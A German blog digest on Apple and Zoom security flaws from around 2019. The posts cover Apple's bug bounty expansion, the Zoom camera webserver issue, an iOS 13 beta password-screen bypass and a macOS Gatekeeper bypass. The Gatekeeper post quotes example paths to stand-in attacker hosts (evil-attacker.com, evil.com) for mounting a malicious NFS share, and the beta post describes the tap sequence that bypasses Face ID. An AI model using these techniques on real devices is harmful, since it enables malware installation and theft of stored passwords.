Ich habe kurz überlegt, ob ich diesen Artikel mit dem inzwischen schon beliebten Facepalm-Emoji einleite, mich dann aber doch dagegen entschieden. Schließlich kann jedem mal ein Fehler unterlaufen. Im aktuellen Fall ist dieser Fehler für Apple allerdings mehr als peinlich. So hat man mit der Veröffentlichung von iOS 12.4 offenbar eine Sicherheitslücke wieder geöffnet, die bereits in iOS 12.2 und früher bestand und die man eigentlich schon mit iOS 12.3 geschlossen hatte. Diese Lücke hat inzwischen sogar dazu geführt, dass nun auch wieder ein Jailbreak für Geräte unter iOS 12.4 zur Verfügung steht, wie Motherboard berichtet.

Während der mögliche Jailbreak als solcher sicherlich kein größeres Problem darstellt, macht die wieder geöffnete Lücke iOS-Geräte mit dem neuesten Betriebssystem jedoch auch wieder für den sogenannten "100+ Day Exploit" anfällig, durch den entsprechend programmierte Apps beispielsweise aus ihrer Sandbox ausbrechen und unberechtigt Nutzerdaten abgreifen können. Auch über manipulierte Webseiten ist ein solcher Angriff theoretisch möglich.

Angesichts der Schwere der nun wieder bestehenden Sicherheitslücke und des öffentlichen Bekanntwerdens kann davon ausgegangen werden, dass Apple kurzfristig ein weiteres iOS-Update veröffentlichen wird, welches die Lücke wieder stopft.

Apple hat in der vergangenen Nacht auf der Black Hat Konferenz in Las Vegas eine Ausweitung seines Bug Bounty Programms bekanntgegeben. Wurden seit August 2016 lediglich Prämien für das Entdecken von Bugs in iOS ausgelobt, umfasst das Programm nun auch die anderen Betriebssysteme macOS, tvOS und watchOS sowie iCloud. Das neue Programm steht sämtlichen Sicherheitsforschern und allen interessierten und technisch begabten Nutzern zur Verfügung, die eine Schwachstelle in Apples Software entdecken offen und umfasst einen maximalen Auszahlungsbetrag von nun 1 Million Dollar (ehemals 200.000,- Dollar) pro entdeckter Lücke, je nach Schwere des Bugs. Meldet man Apple das Problem noch während der Betaphase einer Software, kann man hierauf sogar noch einmal maximal 50% Aufschlag verdienen.

Anfang der Woche gab es bereits Meldungen, wonach Apple ausgewählte Sicherheitsforscher auch mit speziellen Versionen des iPhones, sogenannten "Dev Devices" ausstatten wird, mit denen es leichter ist, Fehler im System zu finden. Wie Apple nun ankündigte, werden diese iPhones in der Tat ausgegeben und zwar im Rahmen des neuen, im kommenden Jahr startenden "iOS Security Research Device Program". Apple möchte auf diese Weise weitere Sicherheitsforscher und Hacker dazu motivieren, sich auf die Suche nach Fehlern in seinen Systemen zu begeben und diese vor dem öffentlichen Bekanntwerden an das Unternehmen zu melden, so dass sie schnellstmöglich behoben werden können. (via MacRumors)

Kürzlich sorgte eine schwere Sicherheitslücke in der Mac-Videokonferenzsoftware Zoom für Aufsehen. Durch einen von der App im Hintergrund installierten Webserver war es möglich, sich über eine manipulierte Webseite Zugriff auf die Kamera des Macs zu verschaffen und diese ohne das dies vom Nutzer gewünscht wäre zu starten. Apple schloss die Lücke über ein stilles macOS-Update, welches man auf die Geräte pushte und das die fragliche Software entfernte. Wie The Verge berichtet, hat Apple nun ein weiteres solches Update ausgerollt, mit dem weitere Sicherheitslücken im Zusammenhang mit dem Zoom-Problem gestopft werden. So stellte sich inzwischen heraus, dass auch die Videokonferenz-Apps RingCentral und Zhumu eine ähnliche Praxis anwendeten wie Zoom.

Erneut ist für die Installation des Patches keine Nutzerinteraktion notwendig. Das Update wird automatisch geladen und im Hintergrund installiert, ohne das der Nutzer hiervon etwas mitbekommt.

Auch wenn es manch einer vermutlich schon nicht mehr hören bzw. lesen mag, werde ich nicht müde, auf die Gefahren von Betaversionen neuer Software und im Speziellen neuer Betriebssysteme hinzuweisen. Die inzwischen immer weiter verbreiteten öffentlichen Betas stellen dabei ein besonders großes Problem dar, da sich die Nutzer oftmals gar nicht über die Auswirkungen solcher Versionen bewusst sind und sie einfach nur aus Neugier auf ihren Alltagsgeräten installieren. Unangenehme Nebenwirkungen wie nicht funktionierende Apps, ein langsames System oder auch ein sich schneller entladender Akku sind da keine Seltenheit und sorgen für Unmut bei den unbedarften Nutzern. Ein weiteres Beispeil für eine solche unangenehme Nebenwirkung steckt nun auch in der aktuellen Beta von iOS 13. In diesem Fall handelt es sich um ein ernstes Sicherheitsproblem im Zusammenhang mit Zugangsdaten, die im Bereich "Passwörter & Accounts > Webseite- & App-Passwörter" in den Geräteeinstellungen gespeichert sind.

Hier ist es nämlich in den aktuellen Betaversionen äußerst einfach, den dort eingezogenen Schutz per Face ID oder Touch ID zu umgehen und so die gespeicherten Passwörter in Klartext einzusehen. Die Kollegen von iDeviceHelp haben das Problem in dem unten eingebetteten YouTube-Video noch einmal demonstriert. Im Wesentlichen muss man einfach nur wiederholt auf den Eintrag "Website- & App-Passwörter" tippen und kann so Face ID oder Touch ID austricksen. Selbstverständlich setzt dies voraus, dass ein potenzieller Angreifer bereits Zugriff auf ein entsperrtes Gerät besitzt.

YouTube Direktlink

Apple wurde inzwischen über den Umstand informiert und wird ihn hoffentlich bereits in der nächsten Beta beseitigen. Das Beispiel zeigt jedoch die Gefahr, die von der Installation von Beta-Betriebssystemen auf Alltagsgeräten ausgehen kann und sollte all denjenigen eine Warnung sein, die dies relativ unreflektiert tun.

Vor ein paar Tagen wurde eine schwere Sicherheitslücke in der Videokonferenz-Software Zoom für den Mac bekannt. Diese installierte im Hintergrund einen Webserver, um Einschränkungen zu umgehen, die Apple mit Safari 12 eingeführt hatte. Durch das Akzeptieren von Schadcode konnte dies jedoch dazu ausgenutzt werden, um über eine manipulierte Webseite die Kamera eines Macs zu starten und den Nutzer auf diese Weise potenziell auszuspionieren. In einem Statement hatte Zoom dies eher als Feature denn als Bug verteidigt. Eine Ansicht, der Apple Gott sei Dank so überhaupt gar nicht folgen mag.

So hat das Unternehmen nun Maßnahmen ergriffen, um den von Zoom installierten Webserver aus seinem Betriebssystem zu entfernen. Hierzu hat Apple ein stilles Update für macOS ausgerollt, welches diese Aufgabe übernimmt, die TechCrunch berichtet. Das Update wird automatisch geladen, installiert und ausgeführt, so dass der Nutzer nichts weiter unternehmen muss. Danke dafür an dieser Stelle.

Inzwischen hat nun auch Zoom reagiert und in einem Blogpost angekündigt, dass man über das Wochenende ebenfalls selbst aktiv werde und Nutzern, die die App erstmals ausführen künftig fragen werde, ob die Videokamera standardmäßig deaktiviert sein und nur auf Anforderung eingeschaltet werden soll. Eine späte aber immerhin richtige Einsicht.

Anfang des Jahres sorgte ein schwerer Bug bei Gruppenanrufen in Apples FaceTime für Aufsehen, durch den Gespräche ohne das Wissen des Angerufenen initiiert werden und die Person auf diese Weise quasi abgehört werden konnte. Apple deaktivierte die Funktion seinerzeit serverseitig so lange, bis das Problem mit einem Softwareupdate aus der Welt geschaffen werden konnte. Ein ähnliches Szenario wiederholt sich nun offenbar auch mit der Walkie-Talkie-App auf der Apple Watch, die Apple mit watchOS 5 eingeführt hatte.

Gegenüber den Kollegen von TechCrunch erklärte Apple, dass man auch diese Funktion aktuell serverseitig deaktiviert habe, da es durch einen Bug offenbar möglich ist, auch hierüber andere Nutzer auszuspionieren. Zwar sei dem Unternehmen kein Fall bekannt, bei dem dies auch wirklich in der Praxis durchgeführt wurde, dennoch habe man sich dazu entschlossen, die Funktion zu deaktivieren, bis das Problem mit einem Softwareupdate behoben ist. Ähnlich wie bei der angesprochenen FaceTime-Problematik dürfte auch dies bedeuten, dass die Walkie-Talkie-App dann nur mit der aktuellsten watchOS-Version wieder funktioniert.

Nachfolgend Apples Statement im Wortlaut:

We were just made aware of a vulnerability related to the Walkie-Talkie app on the Apple Watch and have disabled the function as we quickly fix the issue. We apologize to our customers for the inconvenience and will restore the functionality as soon as possible. Although we are not aware of any use of the vulnerability against a customer and specific conditions and sequences of events are required to exploit it, we take the security and privacy of our customers extremely seriously. We concluded that disabling the app was the right course of action as this bug could allow someone to listen through another customer’s iPhone without consent. We apologize again for this issue and the inconvenience.

Sicherheitsforscher haben eine schwere Sicherheitslücke in der Zoom Videokonferenz-App auf dem Mac entdeckt, die von einem Angreifer potenziell dazu genutzt werden könnte, die Webcam eines MacBooks oder auch gar den kompletten Rechner zu übernehmen. In Medium-Post wird dabei demonstriert, wie ein solches Szenario durch den Aufruf einer simplen manipulierten Webseite ausgelöst werden kann. Ist die Zoom-App auf dem Mac installiert, kann die angesprochene Webseite dazu genutzt werden, einen Videoanruf über die App zu initiieren.

Der Hauptgrund für dieses Verhalten ist offenbar vor allem darauf zurückzuführen, dass die Zoom-App im Hintergrund einen Webserver auf dem Mac installiert, der Anfragen entgegennimmt, die ein regulärer Browser nicht beantworten würden, wie The Verge berichtet. In einer früheren (inzwischen gepatchten) Version der Zoom-App konnte über eine manipulierte Webseite sogar ein DOS (Denial of Service) Angriff auf einen Mac ausgeführt werden.

Jonathan Leitschuh, der Entdecker der Lücke hatte Zoom Ende März über das entdeckte Problem in Kenntnis gesetzt und den Entwicklern die übliche Zeit von 90 Tagen gegeben es zu beheben, ehe es öffentlich gemacht wird. Dieser Aufforderung sind die Entwickler von Zoom bis heute nicht nachgekommen, was jeden Mac auf dem die App installiert ist potenziell angreifbar macht. Nutzer können sich aktuell selbst gegen das Starten der Kamera ihres Macs wehren, indem sie der Zoom-App die Berechtigung entziehen, die Kamera zu starten, sobald man einem Meeting beitritt. In dem oben bereits angesprochenen Medium-Post finden sich zudem verschiedene Terminal-Befehle, mit denen man den Webserver im Hintergrund von seinem Mac entfernen kann.

Gegenüber ZDNet haben sich die Zoom-Entwickler inzwischen mit der halbgaren Entschuldigung zu Wort gemeldet, dass man den Webserver im Hintergrund als "Workaround" benötige, um Änderungen zu behandeln, die Apple (nicht ohne Grund) mit Safari 12 eingeführt hatte. Durch den Workaround sei ein besses Nutzererlebnis gegeben. An dieser Stelle ist dann auch mal wieder ein amtlicher Facepalm angebracht. Leider ist es heutzutage immer öfter der Fall, dass Bequemlichkeit und Komfort die IT-Sicherheit schlagen.

Der Sicherheitsexperte Filippo Cavallarin sorgte über das Wochenende für Aufsehen, indem er eine Schwachstelle im Gatekeeper von macOS öffentlich machte, mit der sich diese Sicherheitsfunktion umgehen lässt. Dies gilt auch nach dem in der vergangenen Woche veröffentlichten Update auf macOS 10.14.5. Zur Erinnerung: Der Gatekeeper sorgt in macOS dafür, dass aus dem Internet heruntergeladene Software unmittelbar auf ihre Herkunft geprüft und der Nutzer evtl. entsprechend gewarnt wird, sollte diese nicht vertrauenswürdig sein.

Laut Cavallarin kann diese Maßnahme jedoch komplett umgangen werden, was vor allem daran liegt, dass der Gatekeeper auch externe Festplatten und Netzlaufwerke pauschal als sichere Herkunftsorte einstuft. Dies bedeutet im Imkehrschluss, dass Software von diesen Orten nicht noch einmal auf ihre Sicherheit hin überprüft werden. Dem Sicherheitsforscher zufolge kann ein Nutzer jedoch relativ einfach in eine Falle gelockt werden, ein manipuliertes Netzlaufwerk zu mounten, von dem dann Software installiert werden kann, ohne dass der Gatekeeper hier eingreift.

So könnte mit dem Pfad "ls /net/evil-attacker.com/sharedfolder/" beispielsweise der Inhalt des Ordners "sharedfolder" auf einem entfernten Server mit der Adresse "evil-attacker.com" per NFS gemountet werden. Zudem können auch in ZIP-Archiven symbolische Links enthalten sein, die ebenfalls eine Möglichkeit bieten, den Gatekeeper zu umgehen. So könnte ein solcher Link beispielsweise auf "Documents -> /net/evil.com/Documents" lauten, wodurch sich der Nutzer nicht mehr auf seinem lokalen Rechner befände, sondern auf dem Ordner "Documents" auf dem Server von evil.com.

Cavallarin habe nach eigener Aussage Apple über die Sicherheitslücke am 22. Februar informiert und das Unternehmen wollte sie eigentlich mit mscOS 10.14.5 in der vergangenen Woche stopfen. Da das 90 Tage Fenster für die Geheimhaltung der Lücke inzwischen verstrichen ist und Apple auch nicht mehr auf E-Mails von Cavallarin reagiert, wurde sie nun öffentlich gemacht. Das nachfolgende Video zeigt sie in Aktion:

YouTube Direktlink